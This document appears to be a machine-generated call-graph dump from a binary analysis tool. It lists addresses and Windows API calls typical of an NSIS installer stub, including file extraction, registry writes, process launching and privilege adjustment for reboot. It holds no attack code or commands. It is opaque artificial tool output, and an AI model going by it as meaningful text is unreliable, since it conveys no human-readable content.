3541->3546 3542->3541 3585 405699 OleInitialize 3542->3585 3543 405796 3549 40579d GetClientRect GetSystemMetrics SendMessageW SendMessageW 3543->3549 3547 40596b 3544->3547 3551 405945 ShowWindow 3544->3551 3552 40591f 3544->3552 3548 404527 8 API calls 3545->3548 3584 4044f5 SendMessageW 3546->3584 3547->3545 3557 405979 SendMessageW 3547->3557 3564 40593e 3548->3564 3555 40580b 3549->3555 3556 4057ef SendMessageW SendMessageW 3549->3556 3553 405965 3551->3553 3554 405957 3551->3554 3558 404499 SendMessageW 3552->3558 3560 404499 SendMessageW 3553->3560 3559 4055c6 28 API calls 3554->3559 3561 405810 SendMessageW 3555->3561 3562 40581e 3555->3562 3556->3555 3563 405992 CreatePopupMenu 3557->3563 3557->3564 3558->3545 3559->3553 3560->3547 3561->3562 3566 4044c0 22 API calls 3562->3566 3565 40657e 21 API calls 3563->3565 3567 4059a2 AppendMenuW 3565->3567 3568 40582e 3566->3568 3569 4059d2 TrackPopupMenu 3567->3569 3570 4059bf GetWindowRect 3567->3570 3571 405837 ShowWindow 3568->3571 3572 40586b GetDlgItem SendMessageW 3568->3572 3569->3564 3574 4059ed 3569->3574 3570->3569 3575 40585a 3571->3575 3576 40584d ShowWindow 3571->3576 3572->3564 3573 405892 SendMessageW SendMessageW 3572->3573 3573->3564 3577 405a09 SendMessageW 3574->3577 3583 4044f5 SendMessageW 3575->3583 3576->3575 3577->3577 3578 405a26 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3577->3578 3580 405a4b SendMessageW 3578->3580 3580->3580 3581 405a74 GlobalUnlock SetClipboardData CloseClipboard 3580->3581 3581->3564 3582->3543 3583->3572 3584->3544 3586 40450c SendMessageW 3585->3586 3590 4056bc 3586->3590 3587 4056e3 3588 40450c SendMessageW 3587->3588 3589 4056f5 CoUninitialize 3588->3589 3590->3587 3591 401389 2 API calls 3590->3591 3591->3590 4454 404d07 4455 404d33 4454->4455 4456 404d17 4454->4456 4458 404d66 4455->4458 4459 404d39 SHGetPathFromIDListW 4455->4459 4465 405b85 GetDlgItemTextW 4456->4465 4461 404d49 4459->4461 4464 404d50 SendMessageW 4459->4464 4460 404d24 SendMessageW 4460->4455 4462 40140b 2 API calls 4461->4462 4462->4464 4464->4458 4465->4460 4466 401588 4467 402bc9 4466->4467 4470 406488 wsprintfW 4467->4470 4469 402bce 4470->4469 4471 40198d 4472 402da9 21 API calls 4471->4472 4473 401994 4472->4473 4474 402da9 21 API calls 4473->4474 4475 4019a1 4474->4475 4476 402dcb 21 API calls 4475->4476 4477 4019b8 lstrlenW 4476->4477 4479 4019c9 4477->4479 4478 401a0a 4479->4478 4483 406541 lstrcpynW 4479->4483 4481 4019fa 4481->4478 4482 4019ff lstrlenW 4481->4482 4482->4478 4483->4481 4484 40168f 4485 402dcb 21 API calls 4484->4485 4486 401695 4485->4486 4487 40689e 2 API calls 4486->4487 4488 40169b 4487->4488 4489 402b10 4490 402da9 21 API calls 4489->4490 4491 402b16 4490->4491 4492 402953 4491->4492 4493 40657e 21 API calls 4491->4493 4493->4492 4494 402711 4495 402da9 21 API calls 4494->4495 4502 402720 4495->4502 4496 40276a ReadFile 4496->4502 4506 40285d 4496->4506 4497 4060b4 ReadFile 4497->4502 4498 4027aa MultiByteToWideChar 4498->4502 4499 40285f 4507 406488 wsprintfW 4499->4507 4500 406112 5 API calls 4500->4502 4502->4496 4502->4497 4502->4498 4502->4499 4502->4500 4503 4027d0 SetFilePointer MultiByteToWideChar 4502->4503 4504 402870 4502->4504 4502->4506 4503->4502 4505 402891 SetFilePointer 4504->4505 4504->4506 4505->4506 4507->4506 4508 401491 4509 4055c6 28 API calls 4508->4509 4510 401498 4509->4510 3434 401794 3472 402dcb 3434->3472 3436 40179b 3437 4017c3 3436->3437 3438 4017bb 3436->3438 3515 406541 lstrcpynW 3437->3515 3514 406541 lstrcpynW 3438->3514 3441 4017c1 3445 4067ef 5 API calls 3441->3445 3442 4017ce 3516 405e10 lstrlenW CharPrevW 3442->3516 3461 4017e0 3445->3461 3449 4017f2 CompareFileTime 3449->3461 3450 4018b2 3482 4055c6 3450->3482 3451 401889 3454 4055c6 28 API calls 3451->3454 3463 40189e 3451->3463 3454->3463 3455 406541 lstrcpynW 3455->3461 3458 4018e3 SetFileTime 3460 4018f5 CloseHandle 3458->3460 3459 40657e 21 API calls 3459->3461 3462 401906 3460->3462 3460->3463 3461->3449 3461->3450 3461->3451 3461->3455 3461->3459 3468 405ba1 MessageBoxIndirectW 3461->3468 3478 40600c GetFileAttributesW 3461->3478 3481 406031 GetFileAttributesW CreateFileW 3461->3481 3519 40689e FindFirstFileW 3461->3519 3464 40190b 3462->3464 3465 40191e 3462->3465 3466 40657e 21 API calls 3464->3466 3467 40657e 21 API calls 3465->3467 3469 401913 lstrcatW 3466->3469 3470 401926 3467->3470 3468->3461 3469->3470 3471 405ba1 MessageBoxIndirectW 3470->3471 3471->3463 3473 402dd7 3472->3473 3474 40657e 21 API calls 3473->3474 3475 402df8 3474->3475 3476 402e04 3475->3476 3477 4067ef 5 API calls 3475->3477 3476->3436 3477->3476 3479 40602b 3478->3479 3480 40601e SetFileAttributesW 3478->3480 3479->3461 3480->3479 3481->3461 3483 4055e1 3482->3483 3492 4018bc 3482->3492 3484 4055fd lstrlenW 3483->3484 3485 40657e 21 API calls 3483->3485 3486 405626 3484->3486 3487 40560b lstrlenW 3484->3487 3485->3484 3489 405639 3486->3489 3490 40562c SetWindowTextW 3486->3490 3488 40561d lstrcatW 3487->3488 3487->3492 3488->3486 3491 40563f SendMessageW SendMessageW SendMessageW 3489->3491 3489->3492 3490->3489 3491->3492 3493 4032d9 3492->3493 3494 4032f2 3493->3494 3495 40331d 3494->3495 3534 4034d4 SetFilePointer 3494->3534 3522 4034be 3495->3522 3499 40333a GetTickCount 3510 40334d 3499->3510 3500 40345e 3501 403462 3500->3501 3506 40347a 3500->3506 3503 4034be ReadFile 3501->3503 3502 4018cf 3502->3458 3502->3460 3503->3502 3504 4034be ReadFile 3504->3506 3505 4034be ReadFile 3505->3510 3506->3502 3506->3504 3507 4060e3 WriteFile 3506->3507 3507->3506 3509 4033b3 GetTickCount 3509->3510 3510->3502 3510->3505 3510->3509 3511 4033dc MulDiv wsprintfW 3510->3511 3525 406ab0 3510->3525 3532 4060e3 WriteFile 3510->3532 3512 4055c6 28 API calls 3511->3512 3512->3510 3514->3441 3515->3442 3517 4017d4 lstrcatW 3516->3517 3518 405e2c lstrcatW 3516->3518 3517->3441 3518->3517 3520 4068b4 FindClose 3519->3520 3521 4068bf 3519->3521 3520->3521 3521->3461 3535 4060b4 ReadFile 3522->3535 3526 406ad5 3525->3526 3527 406add 3525->3527 3526->3510 3527->3526 3528 406b64 GlobalFree 3527->3528 3529 406b6d GlobalAlloc 3527->3529 3530 406be4 GlobalAlloc 3527->3530 3531 406bdb GlobalFree 3527->3531 3528->3529 3529->3526 3529->3527 3530->3526 3530->3527 3531->3530 3533 406101 3532->3533 3533->3510 3534->3495 3536 403328 3535->3536 3536->3499 3536->3500 3536->3502 4525 401a97 4526 402da9 21 API calls 4525->4526 4527 401aa0 4526->4527 4528 402da9 21 API calls 4527->4528 4529 401a45 4528->4529 3635 401598 3636 4015b1 3635->3636 3637 4015a8 ShowWindow 3635->3637 3638 402c4f 3636->3638 3639 4015bf ShowWindow 3636->3639 3637->3636 3639->3638 4530 402419 4531 402dcb 21 API calls 4530->4531 4532 402428 4531->4532 4533 402dcb 21 API calls 4532->4533 4534 402431 4533->4534 4535 402dcb 21 API calls 4534->4535 4536 40243b GetPrivateProfileStringW 4535->4536 4537 40201b 4538 402dcb 21 API calls 4537->4538 4539 402022 4538->4539 4540 40689e 2 API calls 4539->4540 4541 402028 4540->4541 4543 402039 4541->4543 4544 406488 wsprintfW 4541->4544 4544->4543 3668 40351c SetErrorMode GetVersionExW 3669 403570 GetVersionExW 3668->3669 3670 4035a8 3668->3670 3669->3670 3671 4035ff 3670->3671 3672 406935 5 API calls 3670->3672 3673 4068c5 3 API calls 3671->3673 3672->3671 3674 403615 lstrlenA 3673->3674 3674->3671 3675 403625 3674->3675 3676 406935 5 API calls 3675->3676 3677 40362c 3676->3677 3678 406935 5 API calls 3677->3678 3679 403633 3678->3679 3680 406935 5 API calls 3679->3680 3681 40363f #17 OleInitialize SHGetFileInfoW 3680->3681 3756 406541 lstrcpynW 3681->3756 3684 40368e GetCommandLineW 3757 406541 lstrcpynW 3684->3757 3686 4036a0 3687 405e3d CharNextW 3686->3687 3688 4036c6 CharNextW 3687->3688 3696 4036d8 3688->3696 3689 4037da 3690 4037ee GetTempPathW 3689->3690 3758 4034eb 3690->3758 3692 403806 3693 403860 DeleteFileW 3692->3693 3694 40380a GetWindowsDirectoryW lstrcatW 3692->3694 3768 4030a2 GetTickCount GetModuleFileNameW 3693->3768 3697 4034eb 12 API calls 3694->3697 3695 405e3d CharNextW 3695->3696 3696->3689 3696->3695 3702 4037dc 3696->3702 3699 403826 3697->3699 3699->3693 3701 40382a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3699->3701 3700 403874 3703 40392b 3700->3703 3706 40391b 3700->3706 3710 405e3d CharNextW 3700->3710 3704 4034eb 12 API calls 3701->3704 3852 406541 lstrcpynW 3702->3852 3911 403b39 3703->3911 3708 403858 3704->3708 3796 403c13 3706->3796 3708->3693 3708->3703 3723 403893 3710->3723 3712 403a79 3716 405ba1 MessageBoxIndirectW 3712->3716 3713 403a9d 3714 403b21 ExitProcess 3713->3714 3715 403aa5 GetCurrentProcess OpenProcessToken 3713->3715 3717 403af1 3715->3717 3718 403abd LookupPrivilegeValueW AdjustTokenPrivileges 3715->3718 3722 403a87 ExitProcess 3716->3722 3725 406935 5 API calls 3717->3725 3718->3717 3719 4038f1 3853 405f18 3719->3853 3720 403934 3724 405b0c 5 API calls 3720->3724 3723->3719 3723->3720 3727 403939 lstrlenW 3724->3727 3728 403af8 3725->3728 3869 406541 lstrcpynW 3727->3869 3731 403b0d ExitWindowsEx 3728->3731 3733 403b1a 3728->3733 3731->3714 3731->3733 3732 403953 3735 40395c 3732->3735 3753 40396b 3732->3753 3736 40140b 2 API calls 3733->3736 3870 406541 lstrcpynW 3735->3870 3736->3714 3737 403910 3868 406541 lstrcpynW 3737->3868 3740 403991 wsprintfW 3741 40657e 21 API calls 3740->3741 3741->3753 3742 405aef 2 API calls 3742->3753 3743 405a95 2 API calls 3743->3753 3744 403a07 SetCurrentDirectoryW 3907 406301 MoveFileExW 3744->3907 3745 4039cd GetFileAttributesW 3746 4039d9 DeleteFileW 3745->3746 3745->3753 3746->3753 3750 406301 40 API calls 3750->3753 3751 40657e 21 API calls 3751->3753 3752 405b24 2 API calls 3752->3753 3753->3703 3753->3740 3753->3742 3753->3743 3753->3744 3753->3745 3753->3750 3753->3751 3753->3752 3754 403a8f CloseHandle 3753->3754 3755 40689e 2 API calls 3753->3755 3871 405c4d 3753->3871 3754->3703 3755->3753 3756->3684 3757->3686 3759 4067ef 5 API calls 3758->3759 3760 4034f7 3759->3760 3761 403501 3760->3761 3762 405e10 3 API calls 3760->3762 3761->3692 3763 403509 3762->3763 3764 405aef 2 API calls 3763->3764 3765 40350f 3764->3765 3918 406060 3765->3918 3922 406031 GetFileAttributesW CreateFileW 3768->3922 3770 4030e2 3791 4030f2 3770->3791 3923 406541 lstrcpynW 3770->3923 3772 403108 3924 405e5c lstrlenW 3772->3924 3776 403119 GetFileSize 3777 403213 3776->3777 3789 403130 3776->3789 3929 40303e 3777->3929 3779 40321c 3781 40324c GlobalAlloc 3779->3781 3779->3791 3941 4034d4 SetFilePointer 3779->3941 3780 4034be ReadFile 3780->3789 3940 4034d4 SetFilePointer 3781->3940 3783 40327f 3787 40303e 6 API calls 3783->3787 3785 403235 3788 4034be ReadFile 3785->3788 3786 403267 3790 4032d9 39 API calls 3786->3790 3787->3791 3792 403240 3788->3792 3789->3777 3789->3780 3789->3783 3789->3791 3793 40303e 6 API calls 3789->3793 3794 403273 3790->3794 3791->3700 3792->3781 3792->3791 3793->3789 3794->3791 3794->3794 3795 4032b0 SetFilePointer 3794->3795 3795->3791 3797 406935 5 API calls 3796->3797 3798 403c27 3797->3798 3799 403c2d 3798->3799 3800 403c3f 3798->3800 3950 406488 wsprintfW 3799->3950 3801 40640f 3 API calls 3800->3801 3802 403c6f 3801->3802 3804 403c8e lstrcatW 3802->3804 3806 40640f 3 API calls 3802->3806 3805 403c3d 3804->3805 3942 403ee9 3805->3942 3806->3804 3809 405f18 18 API calls 3810 403cc0 3809->3810 3811 403d54 3810->3811 3813 40640f 3 API calls 3810->3813 3812 405f18 18 API calls 3811->3812 3814 403d5a 3812->3814 3815 403cf2 3813->3815 3816 403d6a LoadImageW 3814->3816 3817 40657e 21 API calls 3814->3817 3815->3811 3820 403d13 lstrlenW 3815->3820 3824 405e3d CharNextW 3815->3824 3818 403e10 3816->3818 3819 403d91 RegisterClassW 3816->3819 3817->3816 3822 40140b 2 API calls 3818->3822 3821 403dc7 SystemParametersInfoW CreateWindowExW 3819->3821 3851 403e1a 3819->3851 3825 403d21 lstrcmpiW 3820->3825 3826 403d47 3820->3826 3821->3818 3823 403e16 3822->3823 3830 403ee9 22 API calls 3823->3830 3823->3851 3828 403d10 3824->3828 3825->3826 3829 403d31 GetFileAttributesW 3825->3829 3827 405e10 3 API calls 3826->3827 3831 403d4d 3827->3831 3828->3820 3832 403d3d 3829->3832 3834 403e27 3830->3834 3951 406541 lstrcpynW 3831->3951 3832->3826 3833 405e5c 2 API calls 3832->3833 3833->3826 3836 403e33 ShowWindow 3834->3836 3837 403eb6 3834->3837 3839 4068c5 3 API calls 3836->3839 3838 405699 5 API calls 3837->3838 3840 403ebc 3838->3840 3841 403e4b 3839->3841 3842 403ec0 3840->3842 3843 403ed8 3840->3843 3844 403e59 GetClassInfoW 3841->3844 3846 4068c5 3 API calls 3841->3846 3849 40140b 2 API calls 3842->3849 3842->3851 3845 40140b 2 API calls 3843->3845 3847 403e83 DialogBoxParamW 3844->3847 3848 403e6d GetClassInfoW RegisterClassW 3844->3848 3845->3851 3846->3844 3850 40140b 2 API calls 3847->3850 3848->3847 3849->3851 3850->3851 3851->3703 3852->3690 3953 406541 lstrcpynW 3853->3953 3855 405f29 3856 405ebb 4 API calls 3855->3856 3857 405f2f 3856->3857 3858 4038fd 3857->3858 3859 4067ef 5 API calls 3857->3859 3858->3703 3867 406541 lstrcpynW 3858->3867 3865 405f3f 3859->3865 3860 405f70 lstrlenW 3861 405f7b 3860->3861 3860->3865 3862 405e10 3 API calls 3861->3862 3864 405f80 GetFileAttributesW 3862->3864 3863 40689e 2 API calls 3863->3865 3864->3858 3865->3858 3865->3860 3865->3863 3866 405e5c 2 API calls 3865->3866 3866->3860 3867->3737 3868->3706 3869->3732 3870->3753 3872 405f18 18 API calls 3871->3872 3873 405c6d 3872->3873 3874 405c75 DeleteFileW 3873->3874 3875 405c8c 3873->3875 3876 405dc3 3874->3876 3878 405dac 3875->3878 3954 406541 lstrcpynW 3875->3954 3876->3753 3878->3876 3884 40689e 2 API calls 3878->3884 3879 405cb2 3880 405cc5 3879->3880 3881 405cb8 lstrcatW 3879->3881 3883 405e5c 2 API calls 3880->3883 3882 405ccb 3881->3882 3885 405cdb lstrcatW 3882->3885 3887 405ce6 lstrlenW FindFirstFileW 3882->3887 3883->3882 3886 405dd1 3884->3886 3885->3887 3886->3876 3888 405e10 3 API calls 3886->3888 3887->3878 3905 405d08 3887->3905 3889 405ddb 3888->3889 3891 405c05 5 API calls 3889->3891 3890 405d8f FindNextFileW 3893 405da5 FindClose 3890->3893 3890->3905 3894 405de7 3891->3894 3893->3878 3895 405e01 3894->3895 3896 405deb 3894->3896 3898 4055c6 28 API calls 3895->3898 3896->3876 3899 4055c6 28 API calls 3896->3899 3898->3876 3901 405df8 3899->3901 3900 405c4d 64 API calls 3900->3905 3902 406301 40 API calls 3901->3902 3902->3876 3903 4055c6 28 API calls 3903->3890 3904 4055c6 28 API calls 3904->3905 3905->3890 3905->3900 3905->3903 3905->3904 3906 406301 40 API calls 3905->3906 3955 406541 lstrcpynW 3905->3955 3956 405c05 3905->3956 3906->3905 3908 403a16 CopyFileW 3907->3908 3909 406315 3907->3909 3908->3703 3908->3753 3964 406187 3909->3964 3912 403b51 3911->3912 3913 403b43 CloseHandle 3911->3913 3998 403b7e 3912->3998 3913->3912 3916 405c4d 71 API calls 3917 403a6c OleUninitialize 3916->3917 3917->3712 3917->3713 3919 40606d GetTickCount GetTempFileNameW 3918->3919 3920 40351a 3919->3920 3921 4060a3 3919->3921 3920->3692 3921->3919 3921->3920 3922->3770 3923->3772 3925 405e6a 3924->3925 3926 405e70 CharPrevW 3925->3926 3927 40310e 3925->3927 3926->3925 3926->3927 3928 406541 lstrcpynW 3927->3928 3928->3776 3930 403047 3929->3930 3931 40305f 3929->3931 3932 403050 DestroyWindow 3930->3932 3933 403057 3930->3933 3934 403067 3931->3934 3935 40306f GetTickCount 3931->3935 3932->3933 3933->3779 3936 406971 2 API calls 3934->3936 3937 4030a0 3935->3937 3938 40307d CreateDialogParamW ShowWindow 3935->3938 3939 40306d 3936->3939 3937->3779 3938->3937 3939->3779 3940->3786 3941->3785 3943 403efd 3942->3943 3952 406488 wsprintfW 3943->3952 3945 403f6e 3946 403fa2 22 API calls 3945->3946 3948 403f73 3946->3948 3947 403c9e 3947->3809 3948->3947 3949 40657e 21 API calls 3948->3949 3949->3948 3950->3805 3951->3811 3952->3945 3953->3855 3954->3879 3955->3905 3957 40600c 2 API calls 3956->3957 3958 405c11 3957->3958 3959 405c32 3958->3959 3960 405c20 RemoveDirectoryW 3958->3960 3961 405c28 DeleteFileW 3958->3961 3959->3905 3962 405c2e 3960->3962 3961->3962 3962->3959 3963 405c3e SetFileAttributesW 3962->3963 3963->3959 3965 4061b7 3964->3965 3966 4061dd GetShortPathNameW 3964->3966 3991 406031 GetFileAttributesW CreateFileW 3965->3991 3968 4061f2 3966->3968 3969 4062fc 3966->3969 3968->3969 3971 4061fa wsprintfA 3968->3971 3969->3908 3970 4061c1 CloseHandle GetShortPathNameW 3970->3969 3972 4061d5 3970->3972 3973 40657e 21 API calls 3971->3973 3972->3966 3972->3969 3974 406222 3973->3974 3992 406031 GetFileAttributesW CreateFileW 3974->3992 3976 40622f 3976->3969 3977 40623e GetFileSize GlobalAlloc 3976->3977 3978 406260 3977->3978 3979 4062f5 CloseHandle 3977->3979 3980 4060b4 ReadFile 3978->3980 3979->3969 3981 406268 3980->3981 3981->3979 3993 405f96 lstrlenA 3981->3993 3984 406293 3986 405f96 4 API calls 3984->3986 3985 40627f lstrcpyA 3987 4062a1 3985->3987 3986->3987 3988 4062d8 SetFilePointer 3987->3988 3989 4060e3 WriteFile 3988->3989 3990 4062ee GlobalFree 3989->3990 3990->3979 3991->3970 3992->3976 3994 405fd7 lstrlenA 3993->3994 3995 405fb0 lstrcmpiA 3994->3995 3996 405fdf 3994->3996 3995->3996 3997 405fce CharNextA 3995->3997 3996->3984 3996->3985 3997->3994 3999 403b8c 3998->3999 4000 403b56 3999->4000 4001 403b91 FreeLibrary GlobalFree 3999->4001 4000->3916 4001->4000 4001->4001 4552 401b9c 4553 402dcb 21 API calls 4552->4553 4554 401ba3 4553->4554 4555 402da9 21 API calls 4554->4555 4556 401bac wsprintfW 4555->4556 4557 402c4f 4556->4557 4558 40149e 4559 4023c2 4558->4559 4560 4014ac PostQuitMessage 4558->4560 4560->4559 4561 4016a0 4562 402dcb 21 API calls 4561->4562 4563 4016a7 4562->4563 4564 402dcb 21 API calls 4563->4564 4565 4016b0 4564->4565 4566 402dcb 21 API calls 4565->4566 4567 4016b9 MoveFileW 4566->4567 4568 4016cc 4567->4568 4574 4016c5 4567->4574 4569 40231b 4568->4569 4570 40689e 2 API calls 4568->4570 4572 4016db 4570->4572 4571 401423 28 API calls 4571->4569 4572->4569 4573 406301 40 API calls 4572->4573 4573->4574 4574->4571 4575 401a24 4576 402dcb 21 API calls 4575->4576 4577 401a2b 4576->4577 4578 402dcb 21 API calls 4577->4578 4579 401a34 4578->4579 4580 401a3b lstrcmpiW 4579->4580 4581 401a4d lstrcmpW 4579->4581 4582 401a41 4580->4582 4581->4582 4583 402324 4584 402dcb 21 API calls 4583->4584 4585 40232a 4584->4585 4586 402dcb 21 API calls 4585->4586 4587 402333 4586->4587 4588 402dcb 21 API calls 4587->4588 4589 40233c 4588->4589 4590 40689e 2 API calls 4589->4590 4591 402345 4590->4591 4592 402356 lstrlenW lstrlenW 4591->4592 4593 402349 4591->4593 4595 4055c6 28 API calls 4592->4595 4594 4055c6 28 API calls 4593->4594 4596 402351 4593->4596 4594->4596 4597 402394 SHFileOperationW 4595->4597 4597->4593 4597->4596 4598 401da6 4599 401db9 GetDlgItem 4598->4599 4600 401dac 4598->4600 4602 401db3 4599->4602 4601 402da9 21 API calls 4600->4601 4601->4602 4603 401dfa GetClientRect LoadImageW SendMessageW 4602->4603 4604 402dcb 21 API calls 4602->4604 4606 401e58 4603->4606 4608 401e64 4603->4608 4604->4603 4607 401e5d DeleteObject 4606->4607 4606->4608 4607->4608 4609 4023a8 4610 4023af 4609->4610 4612 4023c2 4609->4612 4611 40657e 21 API calls 4610->4611 4613 4023bc 4611->4613 4614 405ba1 MessageBoxIndirectW 4613->4614 4614->4612 4615 402c2a SendMessageW 4616 402c44 InvalidateRect 4615->4616 4617 402c4f 4615->4617 4616->4617 4625 404f2d GetDlgItem GetDlgItem 4626 4051a4 4625->4626 4627 404f7f 7 API calls 4625->4627 4631 405286 4626->4631 4659 405213 4626->4659 4679 404e7b SendMessageW 4626->4679 4628 405026 DeleteObject 4627->4628 4629 405019 SendMessageW 4627->4629 4630 40502f 4628->4630 4629->4628 4632 405066 4630->4632 4633 40657e 21 API calls 4630->4633 4635 405332 4631->4635 4640 405197 4631->4640 4645 4052df SendMessageW 4631->4645 4634 4044c0 22 API calls 4632->4634 4638 405048 SendMessageW SendMessageW 4633->4638 4639 40507a 4634->4639 4636 405344 4635->4636 4637 40533c SendMessageW 4635->4637 4647 405356 ImageList_Destroy 4636->4647 4648 40535d 4636->4648 4656 40536d 4636->4656 4637->4636 4638->4630 4644 4044c0 22 API calls 4639->4644 4642 404527 8 API calls 4640->4642 4641 405278 SendMessageW 4641->4631 4646 405533 4642->4646 4660 40508b 4644->4660 4645->4640 4650 4052f4 SendMessageW 4645->4650 4647->4648 4651 405366 GlobalFree 4648->4651 4648->4656 4649 4054e7 4649->4640 4654 4054f9 ShowWindow GetDlgItem ShowWindow 4649->4654 4653 405307 4650->4653 4651->4656 4652 405166 GetWindowLongW SetWindowLongW 4655 40517f 4652->4655 4662 405318 SendMessageW 4653->4662 4654->4640 4657 405184 ShowWindow 4655->4657 4658 40519c 4655->4658 4656->4649 4672 4053a8 4656->4672 4684 404efb 4656->4684 4677 4044f5 SendMessageW 4657->4677 4678 4044f5 SendMessageW 4658->4678 4659->4631 4659->4641 4660->4652 4661 4050de SendMessageW 4660->4661 4663 405161 4660->4663 4666 405130 SendMessageW 4660->4666 4667 40511c SendMessageW 4660->4667 4661->4660 4662->4635 4663->4652 4663->4655 4666->4660 4667->4660 4669 4054b2 4670 4054bd InvalidateRect 4669->4670 4673 4054c9 4669->4673 4670->4673 4671 4053d6 SendMessageW 4676 4053ec 4671->4676 4672->4671 4672->4676 4673->4649 4693 404e36 4673->4693 4675 405460 SendMessageW SendMessageW 4675->4676 4676->4669 4676->4675 4677->4640 4678->4626 4680 404eda SendMessageW 4679->4680 4681 404e9e GetMessagePos ScreenToClient SendMessageW 4679->4681 4682 404ed2 4680->4682 4681->4682 4683 404ed7 4681->4683 4682->4659 4683->4680 4696 406541 lstrcpynW 4684->4696 4686 404f0e 4697 406488 wsprintfW 4686->4697 4688 404f18 4689 40140b 2 API calls 4688->4689 4690 404f21 4689->4690 4698 406541 lstrcpynW 4690->4698 4692 404f28 4692->4672 4699 404d6d 4693->4699 4695 404e4b 4695->4649 4696->4686 4697->4688 4698->4692 4702 404d86 4699->4702 4700 40657e 21 API calls 4701 404dea 4700->4701 4703 40657e 21 API calls 4701->4703 4702->4700 4704 404df5 4703->4704 4705 40657e 21 API calls 4704->4705 4706 404e0b lstrlenW wsprintfW SetDlgItemTextW 4705->4706 4706->4695 4002 4024af 4003 402dcb 21 API calls 4002->4003 4004 4024c1 4003->4004 4005 402dcb 21 API calls 4004->4005 4006 4024cb 4005->4006 4019 402e5b 4006->4019 4009 402953 4010 402503 4012 40250f 4010->4012 4014 402da9 21 API calls 4010->4014 4011 402dcb 21 API calls 4013 4024f9 lstrlenW 4011->4013 4015 40252e RegSetValueExW 4012->4015 4016 4032d9 39 API calls 4012->4016 4013->4010 4014->4012 4017 402544 RegCloseKey 4015->4017 4016->4015 4017->4009 4020 402e76 4019->4020 4023 4063dc 4020->4023 4024 4063eb 4023->4024 4025 4024db 4024->4025 4026 4063f6 RegCreateKeyExW 4024->4026 4025->4009 4025->4010 4025->4011 4026->4025 4707 404630 lstrlenW 4708 404651 WideCharToMultiByte 4707->4708 4709 40464f 4707->4709 4709->4708 4710 402930 4711 402dcb 21 API calls 4710->4711 4712 402937 FindFirstFileW 4711->4712 4713 40295f 4712->4713 4717 40294a 4712->4717 4714 402968 4713->4714 4718 406488 wsprintfW 4713->4718 4719 406541 lstrcpynW 4714->4719 4718->4714 4719->4717 4720 401931 4721 401968 4720->4721 4722 402dcb 21 API calls 4721->4722 4723 40196d 4722->4723 4724 405c4d 71 API calls 4723->4724 4725 401976 4724->4725 4726 4049b1 4727 4049dd 4726->4727 4728 4049ee 4726->4728 4787 405b85 GetDlgItemTextW 4727->4787 4730 4049fa GetDlgItem 4728->4730 4736 404a59 4728->4736 4733 404a0e 4730->4733 4731 404b3d 4735 404cec 4731->4735 4789 405b85 GetDlgItemTextW 4731->4789 4732 4049e8 4734 4067ef 5 API calls 4732->4734 4738 404a22 SetWindowTextW 4733->4738 4739 405ebb 4 API calls 4733->4739 4734->4728 4743 404527 8 API calls 4735->4743 4736->4731 4736->4735 4740 40657e 21 API calls 4736->4740 4742 4044c0 22 API calls 4738->4742 4744 404a18 4739->4744 4745 404acd SHBrowseForFolderW 4740->4745 4741 404b6d 4746 405f18 18 API calls 4741->4746 4747 404a3e 4742->4747 4748 404d00 4743->4748 4744->4738 4752 405e10 3 API calls 4744->4752 4745->4731 4749 404ae5 CoTaskMemFree 4745->4749 4750 404b73 4746->4750 4751 4044c0 22 API calls 4747->4751 4753 405e10 3 API calls 4749->4753 4790 406541 lstrcpynW 4750->4790 4754 404a4c 4751->4754 4752->4738 4755 404af2 4753->4755 4788 4044f5 SendMessageW 4754->4788 4758 404b29 SetDlgItemTextW 4755->4758 4763 40657e 21 API calls 4755->4763 4758->4731 4759 404a52 4761 406935 5 API calls 4759->4761 4760 404b8a 4762 406935 5 API calls 4760->4762 4761->4736 4769 404b91 4762->4769 4764 404b11 lstrcmpiW 4763->4764 4764->4758 4767 404b22 lstrcatW 4764->4767 4765 404bd2 4791 406541 lstrcpynW 4765->4791 4767->4758 4768 404bd9 4770 405ebb 4 API calls 4768->4770 4769->4765 4773 405e5c 2 API calls 4769->4773 4775 404c2a 4769->4775 4771 404bdf GetDiskFreeSpaceW 4770->4771 4774 404c03 MulDiv 4771->4774 4771->4775 4773->4769 4774->4775 4776 404c9b 4775->4776 4778 404e36 24 API calls 4775->4778 4777 404cbe 4776->4777 4779 40140b 2 API calls 4776->4779 4792 4044e2 KiUserCallbackDispatcher 4777->4792 4780 404c88 4778->4780 4779->4777 4782 404c9d SetDlgItemTextW 4780->4782 4783 404c8d 4780->4783 4782->4776 4785 404d6d 24 API calls 4783->4785 4784 404cda 4784->4735 4786 40490a SendMessageW 4784->4786 4785->4776 4786->4735 4787->4732 4788->4759 4789->4741 4790->4760 4791->4768 4792->4784 4793 401934 4794 402dcb 21 API calls 4793->4794 4795 40193b 4794->4795 4796 405ba1 MessageBoxIndirectW 4795->4796 4797 401944 4796->4797 4798 4028b6 4799 4028bd 4798->4799 4801 402bce 4798->4801 4800 402da9 21 API calls 4799->4800 4802 4028c4 4800->4802 4803 4028d3 SetFilePointer 4802->4803 4803->4801 4804 4028e3 4803->4804 4806 406488 wsprintfW 4804->4806 4806->4801 4807 401f37 4808 402dcb 21 API calls 4807->4808 4809 401f3d 4808->4809 4810 402dcb 21 API calls 4809->4810 4811 401f46 4810->4811 4812 402dcb 21 API calls 4811->4812 4813 401f4f 4812->4813 4814 402dcb 21 API calls 4813->4814 4815 401f58 4814->4815 4816 401423 28 API calls 4815->4816 4817 401f5f 4816->4817 4824 405b67 ShellExecuteExW 4817->4824 4819 401fa7 4820 402953 4819->4820 4821 4069e0 5 API calls 4819->4821 4822 401fc4 CloseHandle 4821->4822 4822->4820 4824->4819 4825 402fb8 4826 402fe3 4825->4826 4827 402fca SetTimer 4825->4827 4828 403038 4826->4828 4829 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4826->4829 4827->4826 4829->4828 4830 4014b8 4831 4014be 4830->4831 4832 401389 2 API calls 4831->4832 4833 4014c6 4832->4833 4834 40553a 4835 40554a 4834->4835 4836 40555e 4834->4836 4838 405550 4835->4838 4839 4055a7 4835->4839 4837 405566 IsWindowVisible 4836->4837 4845 40557d 4836->4845 4837->4839 4841 405573 4837->4841 4840 40450c SendMessageW 4838->4840 4842 4055ac CallWindowProcW 4839->4842 4843 40555a 4840->4843 4844 404e7b 5 API calls 4841->4844 4842->4843 4844->4845 4845->4842 4846 404efb 4 API calls 4845->4846 4846->4839 4847 401d3c 4848 402da9 21 API calls 4847->4848 4849 401d42 IsWindow 4848->4849 4850 401a45 4849->4850

